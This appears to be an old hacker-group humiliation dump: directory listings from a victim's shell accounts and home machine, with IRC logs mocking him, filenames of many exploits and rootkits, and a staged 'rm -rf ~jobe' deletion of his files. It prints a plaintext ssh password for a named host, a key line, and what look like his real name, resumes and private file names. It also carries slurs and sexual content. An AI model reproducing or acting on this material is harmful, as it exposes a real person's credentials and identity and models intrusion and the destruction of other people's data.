-rw------- 1 jobe jobe 564624 cdrtools-1.9a03-win32-bin.zip
-rw-r--r-- 1 jobe jobe 1563 cgixperl.sh
-rw-r--r-- 1 jobe jobe 4483 cgs.c
-rw-r--r-- 1 jobe jobe 220133 charmaps-0.0.tar.gz
-rw-r--r-- 1 jobe jobe 1797 cl.pl
-rw-r--r-- 1 jobe jobe 3339 clear-1.3.tar.gz
-rw-r--r-- 1 jobe jobe 10596 cmctlSparc
-rw-r--r-- 1 jobe jobe 1309 cmctlSparc.c
drwx------ 2 jobe jobe 512 cmsd
-rw------- 1 jobe jobe 6954 cmsd-horizon.tar.gz
-rw-r--r-- 1 jobe jobe 1872 cnt-svr-filetransfer.tar.gz
drwxr-xr-x 5 jobe jobe 512 compat
drwxr-xr-x 3 jobe jobe 512 conf
drwxr-xr-x 28 jobe jobe 512 contrib
-rwx------ 1 jobe jobe 16384 cpkey.exe
-rw-r--r-- 1 jobe jobe 142 cpu
-rw-r--r-- 1 jobe jobe 16126 crash_1.gz
-rw-r--r-- 1 jobe jobe 16126 crash_2.gz
-rw-r--r-- 1 jobe jobe 16126 crash_3.gz
-rw-r--r-- 1 jobe jobe 16126 crash_4.gz
-rw-r--r-- 1 jobe jobe 16126 crash_5.gz
-rw-r--r-- 1 jobe jobe 16126 crash_6.gz
-rw-r--r-- 1 jobe jobe 2032769 daemon.xpm
-rw-r--r-- 1 jobe jobe 1438 daemonshell.tar.gz
-rw------- 1 jobe jobe 573 dead.letter
-rw-r--r-- 1 jobe jobe 14763 deefaced.jpg
-rw-r--r-- 1 jobe jobe 3437 discover.c
-rw-r--r-- 1 jobe jobe 557056 dm_vmw301.zip
drwxr-xr-x 6 jobe jobe 512 doc
-rwx------ 1 jobe jobe 32768 dropstat
-rw-r--r-- 1 jobe jobe 2368 dstatd.c
-rw-r--r-- 1 jobe jobe 2122 dtcrash1.pl
-rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl
-rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl.494
-rw-r--r-- 1 jobe jobe 31569 dtfuck.c
-rw-r--r-- 1 jobe jobe 31433 dtspcd_ex_v4.c
-rw------- 1 jobe jobe 20050 elfvirii.tar.gz
-rw-r--r-- 1 jobe jobe 4820 epcs2.c
-rw-r--r-- 1 jobe jobe 4820 epcs2.c.773
-rw-r--r-- 1 jobe jobe 4820 epcs2_fix.c
-rwxr-xr-x 1 jobe jobe 5355 er
-rw-r--r-- 1 jobe jobe 10074 errors
-rw-r--r-- 1 jobe jobe 13357 ex_sol8_login_x86.c
-rw-r--r-- 1 jobe jobe 753 exdt-h.txt
-rw-r--r-- 1 jobe jobe 1045 exec_race.c
drwxrwxr-x 2 jobe jobe 1024 fbsd-src
drwxr-xr-x 3 jobe jobe 512 fingerd-fileserver
-rw-r--r-- 1 jobe jobe 2937 fingerd-fileserver.tar.gz
-rw------- 1 jobe jobe 7126 flyswatter.c
-rw-r--r-- 1 jobe jobe 231237 foo.jpg
-rw------- 1 jobe force 20992 forbowie.doc
-rw------- 1 jobe jobe 24655 forbowie.jpg
drwx------ 6 jobe jobe 512 frequency
-rw-r--r-- 1 jobe jobe 70090 frequency.tar.gz
-rw-r--r-- 1 jobe jobe 17374 fuck.ico
-rw-r--r-- 1 jobe jobe 3209 g.c
-rw------- 1 jobe jobe 499200 gzip-solaris-2.6-sparc
-rw-r--r-- 1 jobe jobe 74 haha
-rwxrwxr-x 1 jobe jobe 5005 hair
-rw-rw-r-- 1 jobe jobe 477 hair.c
-rw------- 1 jobe jobe 22481 hellkit-1.2.tar.gz
-rw-r--r-- 1 jobe jobe 1129880 hellodownthere.mpeg
-rw-rw-r-- 1 jobe jobe 1635 here.txt
-rw------- 1 jobe jobe 15 home.ip
-rw-r--r-- 1 jobe jobe 11028 hooklive.c
-rw-r--r-- 1 jobe jobe 3133 ia64-linux-execve.cs
-rw-r--r-- 1 jobe jobe 1735738 iheartyp
drwxr-xr-x 3 jobe jobe 512 include
-rw-rw-r-- 1 jobe jobe 772 install.sh
-rwxrwxr-x 1 jobe jobe 786028 irc
-rw------- 1 jobe jobe 1413120 irc.core
-rw------- 1 jobe jobe 3314 irc.log.#phrack
drwxrwxr-x 9 jobe jobe 1024 ircii-2.9
-rw-rw-r-- 1 jobe jobe 530294 ircii-2.9-roof.tar.gz
-rw------- 1 jobe jobe 6649 irclog.ex
-rw------- 1 jobe jobe 5593056 irclog.ex.#!teso
-rw------- 1 jobe jobe 2619481 irclog.ex.#!wutang
-rw-rw-r-- 1 jobe jobe 18749 j@24.128.147.68
-rw-r--r-- 1 jobe jobe 123738 j@pot.star.delta9-tetrahydrocannabinol.net
-rw------- 1 jobe jobe 12288 jbowie_resume.doc
-rw-rw-r-- 1 jobe jobe 11 joel.num
-rw------- 1 jobe jobe 13333 kain.jpg
drwxr-xr-x 2 jobe jobe 512 kfb
-rw------- 1 jobe jobe 1812 kfb.tar.gz
-rw-rw-r-- 1 jobe jobe 138 kotter.sults
drwx------ 2 jobe jobe 512 ldv3
drwx------ 3 jobe jobe 512 ldv6
-rw------- 1 jobe jobe 233325 libnet.tar.gz
-rw-r--r-- 1 jobe jobe 6605 license.dat
-rw-r--r-- 1 jobe jobe 17391 linspy-for-2.2.x.tgz
-rw-rw-r-- 1 jobe jobe 5465996 linux-2.2.16.tar.gz
-rw------- 1 jobe force 1978 lolita.c
-rw------- 1 jobe jobe 14065 lsd.telnet
-rw-r--r-- 1 jobe jobe 73338 m00
drwx------ 2 jobe jobe 512 mail
drwxr-xr-x 2 jobe jobe 512 man
-rw-r--r-- 1 jobe jobe 46669824 miabang01.mpeg
-rwx------ 1 jobe jobe 48735 modctl.c
-rw------- 1 jobe jobe 369012 more.core
-rw-r--r-- 1 jobe jobe 123738 multiscan-0.8.5.tar.gz
-rwxrwxr-x 1 jobe jobe 1192226 mutt
drwxrwxr-x 9 jobe jobe 5120 mutt-1.2.5
-rw-r--r-- 1 jobe jobe 1973923 mutt-1.2.5i.tar.gz
-rwx--x--x 1 jobe jobe 1198086 mutt2
-rw------- 1 jobe jobe 1696777 n4pst3r.exe
-rw-rw-r-- 1 jobe jobe 1738 n4rf
drwxr-xr-x 2 jobe jobe 1024 named
-rw------- 1 jobe jobe 2581 netbackup_exec.pl
-rw------- 1 jobe jobe 1143664 new.mp3
-rw-r--r-- 1 jobe jobe 10061 newhert.txt
-rw-r--r-- 1 jobe jobe 282701 odbc.doc.tar.gz
-rw-r--r-- 1 jobe jobe 293 optyx.stuff
-rw-r--r-- 1 jobe jobe 1527342 outfile
-rw-r--r-- 1 jobe jobe 1527342 outfile
-rw-r--r-- 1 jobe jobe 58593 patch-1.2.5.rr.compressed.1
drwxr-xr-x 2 jobe jobe 512 paz-1.0
-rw-r--r-- 1 jobe jobe 1684 paz-1.0.tar.gz
-rw------- 1 jobe jobe 7704 pc_sice3.zip
-rw-r--r-- 1 jobe jobe 338 pcic.out
-rw------- 1 jobe jobe 7918 pcnfsd-priv.tar.gz
drwx------ 2 jobe jobe 512 pcnfsd_remote
-rw------- 1 jobe jobe 142046 penguins.zip
-rw------- 1 jobe jobe 161242 pf.irc
-rw------- 1 jobe jobe 72171 phear-r0ute.gif
-rw------- 1 jobe jobe 2595 pomah.sh
-rw------- 1 jobe jobe 0 postponed
-rw------- 1 jobe jobe 16124 prettyweed.jpg
-rw-r--r-- 1 jobe jobe 2770 probe-2.3.tar.gz
-rw-r--r-- 1 jobe jobe 599 readme
-rw------- 1 jobe jobe 42247 redir-2.2.1.tar.gz
drwxr-xr-x 2 jobe jobe 1024 res
-rw-r--r-- 1 jobe jobe 16000 rough.notes
-rw------- 1 jobe jobe 7714 rsi-fbsd3.0.tgz
-rw-rw-r-- 1 jobe jobe 18 server
-rwxr-xr-x 1 jobe jobe 172032 sgiawd-lmcrypt
-rwxr-xr-x 1 jobe jobe 293004 sgifd-lmcrypt
drwxrwxr-x 6 jobe jobe 512 shellkit
-rw-rw-r-- 1 jobe jobe 16370 shellkit-20010618.tgz
drwxr-xr-x 7 jobe jobe 512 shres
-rw-r--r-- 1 jobe jobe 13076 sl-binary-kit.tar.gz.pgp
-rw------- 1 jobe jobe 449 spoof.c
-rw------- 1 jobe jobe 3235 spooflib.c
drwxr-xr-x 4 jobe jobe 512 src
-rw-r--r-- 1 jobe jobe 1911375 ssh-2.4.0.tar.gz
-rw-r--r-- 1 jobe jobe 300240 sshd.stuff.tar.gz
-rw-r--r-- 1 jobe jobe 45337 sshd_exp.tgz
-rw-rw-r-- 1 jobe jobe 6444 strmod
-rwx------ 1 jobe jobe 5442 strmod.c
-rw------- 1 jobe jobe 2707 strmod.tar.gz
-rwxr-xr-x 1 jobe jobe 14754 strs
-rw-r--r-- 1 jobe jobe 294 strs.c
-rw-r--r-- 1 jobe jobe 6360 t-shirt-4.0.tar.gz
-rw-r--r-- 1 jobe jobe 2123 t3.c
-rwxr-xr-x 1 jobe jobe 27505 tb
-rw-r--r-- 1 jobe jobe 68401 thc-uht1.tgz
-rwxr-xr-x 1 jobe jobe 14754 tmp
-rw------- 1 jobe jobe 26 tmp.c
drwxr-xr-x 3 jobe jobe 512 tools
-rw-r--r-- 1 jobe jobe 18860 tsl_bind.c
-rw------- 1 jobe jobe 9886 ttdb4sol26.c
-rw------- 1 jobe jobe 10150 ttnew.c
drwx------ 2 jobe jobe 512 tx
-rw-r--r-- 1 jobe jobe 23145 tx.tar.gz
-rw------- 1 jobe jobe 5290472 utssrc.tar.gz
-rwx------ 1 jobe jobe 275 w.pl
-rw------- 1 jobe jobe 8385 w00lien-20020217.tgz
-rw-rw-r-- 1 jobe jobe 28218 w00t;
-rw------- 1 jobe jobe 3338 w1.sh
-rw------- 1 jobe jobe 3453 w1ng.sh
drwxr-xr-x 2 jobe jobe 512 wepcrack-v0.3
-rw------- 1 jobe jobe 8771 wepcrack-v0.3.tar.gz
-rw------- 1 jobe jobe 2762 win2kfaq.txt
drwxrwxr-x 4 jobe jobe 1024 winpenguins
drwx------ 2 jobe jobe 512 worm
-rw------- 1 jobe jobe 24088 worm-src.tar.gz
-rw-r--r-- 1 jobe jobe 3469 wuftpfmt.pl
-rw------- 1 jobe jobe 58909 xenv2.tgz
-rw-r--r-- 1 jobe jobe 4949600 ya_it_doez.mp3
-rw-r--r-- 1 jobe jobe 3176 zap3.tar.gz
<r0b1nleech> Awesome homedir, you are an old school hacker it seems.
<jobe> well i started hacking phone switches and then moved on to redhat
+ systems. i'm currently into darwin systems. lots of porn on those.
<r0b1nleech> Your email is huge!
<jobe> fuck yah man
<jobe> i g0t so much email
<jobe> im subscribed to securityfocus bugtraq
<jobe> incidents
<jobe> w00w00 list
<jobe> vuln dev
<jobe> hert private mailing list
<jobe> teso private mailing list
<jobe> teso public mailing list
<jobe> hert public mailing list
<jobe> vuln dev
<jobe> honeypots
<jobe> private BoW mailing list
<jobe> raver's mailing list
<jobe> the porn trader's mailing list
<jobe> also the dropstatd withdrawl mailing list
<r0b1nleech> What is in your .phoenixaway?
<jobe> everything anyone has messaged me since 1996.
<jobe> I PUT SMILEY FACES IN SHELLCODE BECAUSE IT MAKES ME HAPPY
<r0b1nleech> Ok I am going to rm your hert home dir now ok?
<jobe> no problem, let me back it up first
<r0b1nleech> No.
$ rm -rNOOOOOOOOOOOf ~jobeOFKAG@K@#3,2#F_EKGFDS
$ rm -rf ~jobe
$ ^C^D^D
<[rooster]> jbl: i am in the process of interviewing at enterasys
<jbl> i got an interview with a staffing firm tomorrow morning
<jbl> with mcdonalds
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
> I JUST GOT RM'D
<jeru> damn
<mjf> that sux
<jobe> hi homo
<vmy> jobe you tool
*jeru* howd you own him?
*jeru* howd you own him?
> *jeru* howd you own him?
<jobe> if he ownz np9 it's not that hard.
NOTE TO SELF, IT HAS NO SUIDS, NO PUBLIC VULNS, HOW COULD JOBE OWN IT?
> WOOWOO IS NEXT
> JNATHAN IS NEXT
> YOUR FUCKED KID
<vmy> lol
NOTE TO SELF, vmy lol, VMY GOT OWNED ONCE!
<vmy> man
<vmy> noone ever gets rmed any more
> ILL RM YOU NEXT PUSSY
<jobe> duh like the whole world doesn't know my passwd's
NOT TO SELF, GOD JOBE IS A FUCKING IDIOT
<vmy> uh go for it bro
> <jobe> duh like the whole world doesn't know my passwd's
> <jobe> duh like the whole world doesn't know my passwd's
<jobe> hey thats not funny stop
<r0b1nleech> Ok, take us to the next stop along the tour.
<jobe> lets check out slack.net next.
$ ssh -l jbowie slack.net
jbowie@slack.net's password: abc123slack
<jobe> here is my homedir:
$ ls -al
drwxr-x--x 9 jbowie jbowie 2560 .
drwxr-xr-x 807 root wheel 13312 ..
-rw-r--r-- 1 jbowie jbowie 51 .addressbook
-rw-r--r-- 1 jbowie jbowie 2342 .addressbook.lu
-rw-r--r-- 1 jbowie jbowie 117 .bash_history
-rw-r--r-- 1 jbowie jbowie 716 .cshrc
-rw------- 1 jbowie jbowie 2314 .history
-rw-r--r-- 1 jbowie jbowie 322 .irc.easyinst.status
-rw-r--r-- 1 jbowie jbowie 12 .ircrc
-rw-r--r-- 1 jbowie jbowie 233 .login
-rw-r--r-- 1 jbowie jbowie 105 .mailrc
-rw-r--r-- 1 jbowie jbowie 1148 .phoenix
-rw-r--r-- 1 jbowie jbowie 18841 .phoenix.away
-rw------- 1 jbowie jbowie 8191 .pine-debug1
-rw------- 1 jbowie jbowie 19392 .pine-debug2
-rw------- 1 jbowie jbowie 9905 .pine-debug3
-rw------- 1 jbowie jbowie 7737 .pine-debug4
-rw-r--r-- 1 jbowie jbowie 11891 .pinerc
-rw-r--r-- 1 jbowie jbowie 114 .profile
lrwxr-xr-x 1 jbowie jbowie 9 .rhosts -> /dev/null
drwxr-xr-x 2 jbowie jbowie 512 .ssh
drwxr-xr-x 5 jbowie jbowie 512 .tin
-rw-r--r-- 1 jbowie jbowie 15 475.shtml
-rw-r--r-- 1 jbowie jbowie 15 547.shtml
-rw-r--r-- 1 jbowie jbowie 6952 574.shtml
-rw-r--r-- 1 jbowie jbowie 15 745.shtml
-rw-r--r-- 1 jbowie jbowie 15 754.shtml
-rw-r--r-- 1 jbowie jbowie 192540 BIOS.ZIP
-rw------- 1 jbowie jbowie 51591041 Mailbox
-rw-rw-rw- 1 jbowie jbowie 0 Mailbox.lock.949010036.18118.schwing
-rw-r--r-- 1 jbowie jbowie 0 Mailbox.lock.953165142.7684.schwing
-rw-r--r-- 1 jbowie jbowie 481 Makefile
-rw-r--r-- 1 jbowie jbowie 179 README
drwxr-xr-x 2 jbowie jbowie 512 WWW
-rw-r--r-- 1 jbowie jbowie 1100 a
-rwxr-xr-x 1 jbowie jbowie 14758 add
-rw-r--r-- 1 jbowie jbowie 80 add.c
-rw-r--r-- 1 jbowie jbowie 591 arbcmdsc.tar.gz
-rw-r--r-- 1 jbowie jbowie 400 asm.c
-rw------- 1 jbowie jbowie 532480 authlie-1.0.tar
-rw-r--r-- 1 jbowie jbowie 34816 benefits.doc
-rw-r--r-- 1 jbowie jbowie 1244994 bind-src.tar.gz
-rw-r--r-- 1 jbowie jbowie 4947 bind8.html
-rw-r--r-- 1 jbowie jbowie 596 blah
-rw-r--r-- 1 jbowie jbowie 1187 blah.htmnl
-rw-r--r-- 1 jbowie jbowie 2779 blah.lm
-rw-r--r-- 1 jbowie jbowie 596 blah.new
-rw-r--r-- 1 jbowie jbowie 274 blah.sort
-rwxr-xr-x 1 jbowie jbowie 6174 bufmod.7
-rwxr-xr-x 1 jbowie jbowie 20566 cae
-rw------- 1 jbowie jbowie 1282396 cae.core
-rw-r--r-- 1 jbowie jbowie 375 cool.fortunes
drwxr-xr-x 4 jbowie jbowie 512 cyberarmy
-rw-r--r-- 1 jbowie jbowie 731 cyberarmy.exp.c
-rw------- 1 jbowie jbowie 307 dead.letter
-rw-r--r-- 1 jbowie jbowie 29819 dlcommon.c
-rw-r--r-- 1 jbowie jbowie 1178 dlinfo.c
-rw-r--r-- 1 jbowie jbowie 2493 dlmdata.c
-rwxr-xr-x 1 jbowie jbowie 1937 dlpi.7
-rw-r--r-- 1 jbowie jbowie 3064 dlrcv.c
-rw-r--r-- 1 jbowie jbowie 498 dltest.h
-rw-r--r-- 1 jbowie jbowie 79264 dltest.ps
-rwxr-xr-x 1 jbowie jbowie 39859 dltest.tar.gz
-rw-r--r-- 1 jbowie jbowie 2727 dlunitdatareq.c
-rw-r--r-- 1 jbowie jbowie 44544 dracon-olc.doc
-rw-r--r-- 1 jbowie jbowie 0 dumb.c
-rwxr-xr-x 1 jbowie jbowie 14779 f00
-rw-r--r-- 1 jbowie jbowie 3212 f00.c
-rw------- 1 jbowie jbowie 348508 f00.core
-rw------- 1 jbowie jbowie 348508 f00.core
-rw-r--r-- 1 jbowie jbowie 274 findproc.c
-rw-r--r-- 1 jbowie jbowie 30665 fornax-0.0.5.tar.gz
-rwxr-xr-x 1 jbowie jbowie 4261 fp
-rw------- 1 jbowie jbowie 1939 fts.c
-rwxr-xr-x 1 jbowie jbowie 1248915 irc
-rw-r--r-- 1 jbowie jbowie 530294 ircii-2.9-roof.tar.gz
-rw------- 1 jbowie jbowie 5040 irclog.ex.#!w00w00
-rw-r--r-- 1 jbowie jbowie 1597856 jobe.attrition.tar.gz
-rw-r--r-- 1 jbowie jbowie 2750 jobe.resume
-rw-r--r-- 1 jbowie jbowie 4792 jobelog
-rwxr-xr-x 1 jbowie jbowie 7710 le.7
-rw-r--r-- 1 jbowie jbowie 4914 lsa.synth
drwx------ 2 jbowie jbowie 512 mail
-rw-r--r-- 1 jbowie jbowie 1975 nap.c
-rw-r--r-- 1 jbowie jbowie 4413 netmap.bmp.gz
-rw-r--r-- 1 jbowie jbowie 594 new
-rw-r--r-- 1 jbowie jbowie 456 new.procs
-rw-r--r-- 1 jbowie jbowie 508 new.procs2
-rw-r--r-- 1 jbowie jbowie 916150 nsrouter.c675.2.3.0.053.bin
-rw-r--r-- 1 jbowie jbowie 161242 pf.irc
-rwxr-xr-x 1 jbowie jbowie 8268 pfmod.7
-rw-r--r-- 1 jbowie jbowie 480 procs
-rw-r--r-- 1 jbowie jbowie 518 procs2
-rw-r--r-- 1 jbowie jbowie 3360 prym-log
drwxr-xr-x 3 jbowie jbowie 512 public_html
drwxr-xr-x 2 jbowie jbowie 512 s0x
-rw-r--r-- 1 jbowie jbowie 5419 s0x.tgz
-rw-r--r-- 1 jbowie jbowie 65 safsite.out
-rw-r--r-- 1 jbowie jbowie 42949 sexchart.8
-rw-r--r-- 1 jbowie jbowie 600 shellcode2.c
-rw-r--r-- 1 jbowie jbowie 669 sparccmd.c
-rwxr-xr-x 1 jbowie jbowie 120642 spook
-rw------- 1 jbowie jbowie 1049 spook.c
-rw-r--r-- 1 jbowie jbowie 365 test.c
-rwxr-xr-x 1 jbowie jbowie 6007 w00crond
<r0b1nleech> I took a look at f00.c, that the lsd-pl ldt exploit isn't it?
<jobe> yes
<r0b1nleech> Did it work on slack.net openbsd 2.4?
<jobe> i almost got it working i think
<jobe> it keeps segfaulting so that is a good sign
$ rm ~~~~~~~~~jjjjjjjjjjbooooooooooowwwwwwwiieeeeeeeeeeeeeeeeeeeeee
*** Mode change "-o+b jdogg *!jbowie@slack.net" on channel #phrack by Swern
<vmy> hows it comin?
> RMD
> OWNED
*** You have been kicked off channel #cdc by jnathan (Bitch-X BaBy!)
<jobe> man i can't believe it took u guys this long
<jobe> ive used the same password on every shell box for like 7 years
<jobe> took you long enough to catch on
NOTE TO SELF, MAYBE WE ARE JUST TIRED OF OWNING YOU AND FELT LIKE RMING YOU.
> EVERYONE HAS YOUR PASSWORD JOBE
> WE'VE HAD YOUR BOXES FOR 7 YEARS
<jobe> didnt i already tell you that retard
> JOBE
> FACE IT
> YOUR MYTHICAL HACKER MYSTIQUE
> HAS BEEN DESTROYED
> key_22_quantum.efni.com.pub
> WE OWNED YOUR LAME SOLARIS FOR YEARS TOO
<jobe> what mythical hacker mystique?
NOTE TO SELF, JOBE IS THE DARKSIDE.
<jobe> efni waz megaowned
<mjf> jdogg
<jeru> heh
<jnathan> this is getting old :)
<mjf> who are you?
<jnathan> funny, but old
> SHUT THE FUCK UP JNATHAN
<kozubik> wait
<mjf> what about apollo.gtei.net?
NOTE TO SELF, EKIM IS A NARC.
*kozubik* are you JD roberson ?
> APOLLO.GTI.NET
> GAIUS OWNED THAT
*** kozubik has changed the topic on channel #cdc to Nice nice very nice.
> AND TUNNELX IT
<mjf> lol
<mjf> hahaha
<mjf> the gre thing
<kozubik> must be a different jdogg.
<jobe> i dont use netscape for my pron
<jobe> u missed one
<jobe> or 2
<jobe> but thatz ok
> WHICH ONE
<newsham> jdogg is last
<jobe> figure it out hacker genius
> THE OTHERS NOT SOGOOD
> DONT MAKE ME GO RM THOSE TOO
> 0wned.org 1024 41 63897960634680087987473578821662473115676645146414098567729063962534050419025098865273166743308876730034769029776760707909878397798858888397059595356385321592348348338355240266795644650505202538605163304067738669371599283352177980986565362816775661015680930496199752053852827022342775527838857458044942037271
<jobe> ok let us check out my home box now
<jobe> this is the grand finale
<r0b1nleech> Great scotts.
$ ls -al
total 230904
drwxr-xr-x 10 j staff 1536 .
drwxr-xr-x 7 root root 512 ..
-rw------- 1 420 staff 240 .Xauthority
-rw-r--r-- 1 420 staff 124 .cshrc
-rw-r--r-- 1 420 staff 581 .login
-rw------- 1 root staff 100 .sh_history
drwxr-xr-x 3 420 staff 512 .ssh2
drwxrwxrwx 86 420 staff 2048 7_Recommended
-rw-r--r-- 1 420 staff 41787799 7_Recommended.zip
-rwxr-xr-x 1 j staff 6996 Test
-rw-r--r-- 1 j staff 77 Test.c
-rwxr-xr-x 1 root other 70960 a
-rw-r--r-- 1 root other 126 a.c
-rwxr-xr-x 1 root other 7408 addr_wr_test
-rw-r--r-- 1 root other 285 addr_wr_test.c
-rwxr-xr-x 1 j staff 7192 b1nd
-rw-r--r-- 1 j staff 141 b1nd.c
-r-xr-xr-x 1 root other 6874624 bash-2.05-sol7-sparc-local
-rwxr-xr-x 1 j staff 18436 bb
-rw-r--r-- 1 j staff 11694 bb.c
drwxr-xr-x 15 77 1002 1024 binutils-020210
-rw-r--r-- 1 root other 57057280 binutils.tar
drwxr-xr-x 9 root root 512 cde
-rw------- 1 root other 29616 core
-rwxr-xr-x 1 j staff 3255348 dbx-sparc
-r-xr-xr-x 1 root other 411648 gzip-1.2.4-sol7-intel-local
-r-xr-xr-x 1 root other 291328 gzip-1.2.4a-sol7-intel-local
-rw-r--r-- 1 root other 1489931 includes.tar.gz
-rwxr-xr-x 1 420 staff 2326360 irc
drwxr-xr-x 9 420 staff 1024 ircii-2.9
-rw-r--r-- 1 420 staff 2508800 ircii-2.9-roof.tar
-r-xr-xr-x 1 j staff 29512 login
drwxr-xr-x 2 j staff 512 logintest
-r--r--r-- 1 j staff 5361 pam_impl.h
-rw-r--r-- 1 420 staff 161242 pf.irc
drwxr-xr-x 2 j staff 512 plttest
-rw-r--r-- 1 j staff 2237 rquota.h
-rw-r--r-- 1 j staff 1526 rquota.x
-rw-r--r-- 1 j staff 1094 rquota_clnt.c
-rw-r--r-- 1 j staff 4703 rquota_svc.c
-rw-r--r-- 1 j staff 5368 rquota_xdr.c
-rwxr-xr-x 1 root other 6992 sizint
-rw-r--r-- 1 root other 84 sizint.c
-rwxr-xr-x 1 root other 15680 sl
-rw-r--r-- 1 j staff 7051 sol.tar.gz
-rw-r--r-- 1 j staff 1489778 sol7-includes.tar.gz
-rw-r--r-- 1 j staff 11817 sparc_login.c
drwxr-xr-x 14 root root 512 src
-rwxr-xr-x 1 j staff 9504 test
-rw-r--r-- 1 j staff 153 test.c
-rwxr-xr-x 1 j staff 7052 tmp
-rw-r--r-- 1 j staff 128 tmp.c
-rw-r--r-- 1 root other 9847 truss
-rwxr-xr-x 1 j staff 10344 uf
-rw-r--r-- 1 j staff 2441 uf.c
-rwxr-xr-x 1 j staff 9684 uf2
-rwxr-xr-x 1 420 staff 8280 w
-rw-r--r-- 1 420 staff 1520 w00.c
-rwxr-xr-x 1 j staff 9956 w00f
-rw-r--r-- 1 j staff 2433 w00f.c
-rw-r--r-- 1 root other 141 w00t.c
-rwxr-xr-x 1 j staff 9084 z2
-rw-r--r-- 1 j staff 2006 z2.c
-rwxr-xr-x 1 j staff 14252 z3
-rw-r--r-- 1 j staff 7812 z3.c
$ ls -al ~jduck
drwxr-xr-x 2 jduck staff 512 .
drwxr-xr-x 7 root root 512 ..
-rw------- 1 jduck staff 1646 .bash_history
-rw-r--r-- 1 jduck staff 121 .bashrc
-rw-r--r-- 1 jduck staff 124 .cshrc
-rw-r--r-- 1 jduck staff 581 .login
-rw-r--r-- 1 root root 368 Makefile
-rw-r--r-- 1 root root 1423 README
-rwsr-xr-- 1 root suid 7192 b1nd
-rw------- 1 root other 218608 core
-rw-r--r-- 1 root other 0 kkk
-rw-r--r-- 1 root other 1200 memmove.o
-rwxr-xr-x 1 jduck staff 15576 sl
-rwxr-xr-x 1 root other 15608 sparc_login
-rw-r--r-- 1 jduck staff 8662 sparc_login.c
-rw-r--r-- 1 root other 98324 strmod
-rwxr-xr-x 1 35303 root 5442 strmod.c
-rw-r--r-- 1 root other 96352 strmod.o
-rw-r--r-- 1 jduck staff 10240 strmod.tar
-rw-r--r-- 1 root other 1164 strstr.o
$ ls -al ~palmers
total 106
drwxr-xr-x 3 palmers staff 512 .
drwxr-xr-x 7 root root 512 ..
-rw-rw-rw- 1 root staff 46 .bashrc
-rw-rw-rw- 1 root staff 46 .profile
-rwsr-xr-- 1 root suid 7192 b1nd
-rw-r--r-- 1 palmers staff 40960 soa.tar
drwxrwxrwx 2 30 root 512 soladore-0.00
<r0b1nleech> More, more!
$ ls -al /windows
total 6566658
-rwxr-xr-x 1 root wheel 4 $DRVLTR$.~_~
-r-xr-xr-x 1 root wheel 228240 $LDR$
drwxr-xr-x 1 root wheel 32768 $WIN_NT$.~BT
-rwxr-xr-x 1 root wheel 4700204 (Bill Clinton) - Al Gore Paradise.wav
drwxr-xr-x 1 root wheel 32768 .
drwxr-xr-x 22 root wheel 512 ..
-rwxr-xr-x 1 root wheel 18948140 0151 - Bill Clinton - Sex Is Dandy (Marcy Playground - Sex & Candy).wav
-rwxr-xr-x 1 root wheel 29439 101500.cgi
-rwxr-xr-x 1 root wheel 565 101500.zip
drwxr-xr-x 1 root wheel 32768 3dsmaxtemp
-rwxr-xr-x 1 root wheel 667222016 4.4-install.iso
-r-xr-xr-x 1 root wheel 566 ASD.LOG
drwxr-xr-x 1 root wheel 32768 ATI
-rwxr-xr-x 1 root wheel 271 AUTOEXEC.BAK
-rwxr-xr-x 1 root wheel 254 AUTOEXEC.BAT
-rwxr-xr-x 1 root wheel 392 AspiLog.TXT
drwxr-xr-x 1 root wheel 32768 BDE
-r-xr-xr-x 1 root wheel 178 BOOT.INI
-rwxr-xr-x 1 root wheel 46822 BOOTLOG.PRV
-rwxr-xr-x 1 root wheel 56966 BOOTLOG.TXT
-r-xr-xr-x 1 root wheel 512 BOOTSECT.DOS
-rwxr-xr-x 1 root wheel 15611948 Bill_Clinton-Gettin_sticky_wit_it.wav
-rwxr-xr-x 1 root wheel 51300908 Billy Joel - We Didn't Start the Fire.wav
-rwxr-xr-x 1 root wheel 11776 Bowie_Jonathan.doc
-r-xr-xr-x 1 root wheel 241696 CLASSES.1ST
-rwxr-xr-x 1 root wheel 93040 COMMAND.COM
-rwxr-xr-x 1 root wheel 0 CONFIG.BAK
-rwxr-xr-x 1 root wheel 0 CONFIG.SYS
drwxr-xr-x 1 root wheel 32768 Casey's Punk
-rwxr-xr-x 1 root wheel 12156 CaseyXmasXXX.cmp
drwxr-xr-x 1 root wheel 32768 Casino
-rwxr-xr-x 1 root wheel 46404 DETLOG.TXT
-rwxr-xr-x 1 root wheel 40527404 DJ Diggity - Nelly & Others - (Hot Shit) Country Grammar [Remix].wav
-rwxr-xr-x 1 root wheel 20381228 Isaac - Face Down, Ass Up, That's the way we like to fuck.wav
-rwxr-xr-x 1 root wheel 3951 Dreamisoz.fr.st-hlg-hunt.bob
-rwxr-xr-x 1 root wheel 32768 Excitebike 64 (U) [!].mpk
-rwxr-xr-x 1 root wheel 16777216 Excitebike 64 (U) [!].rom
-rwxr-xr-x 1 root wheel 6445060 Expert Blowjob01 (19 Sec) - Amazing! Deepthroat Blowjob Sex Young Hidden Voyeur Amateur.mpg
drwxr-xr-x 1 root wheel 32768 FFX Videos
drwxr-xr-x 1 root wheel 32768 FLWBass Demo
drwxr-xr-x 1 root wheel 32768 Folder Settings
drwxr-xr-x 1 root wheel 32768 Games
drwxr-xr-x 1 root wheel 32768 Hack
drwxr-xr-x 1 root wheel 32768 INSTALL
-r-xr-xr-x 1 root wheel 110080 IO.SYS
-rwxr-xr-x 1 root wheel 608 IPH.PH
-rwxr-xr-x 1 root wheel 46058037 ISS.System.Security.Scanner.v4.WinNT2K.DOD.tar.gz
drwxr-xr-x 1 root wheel 32768 ISSv4
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R00
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R01
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R02
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R03
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R04
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R05
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R06
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R07
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R08
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R09
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R10
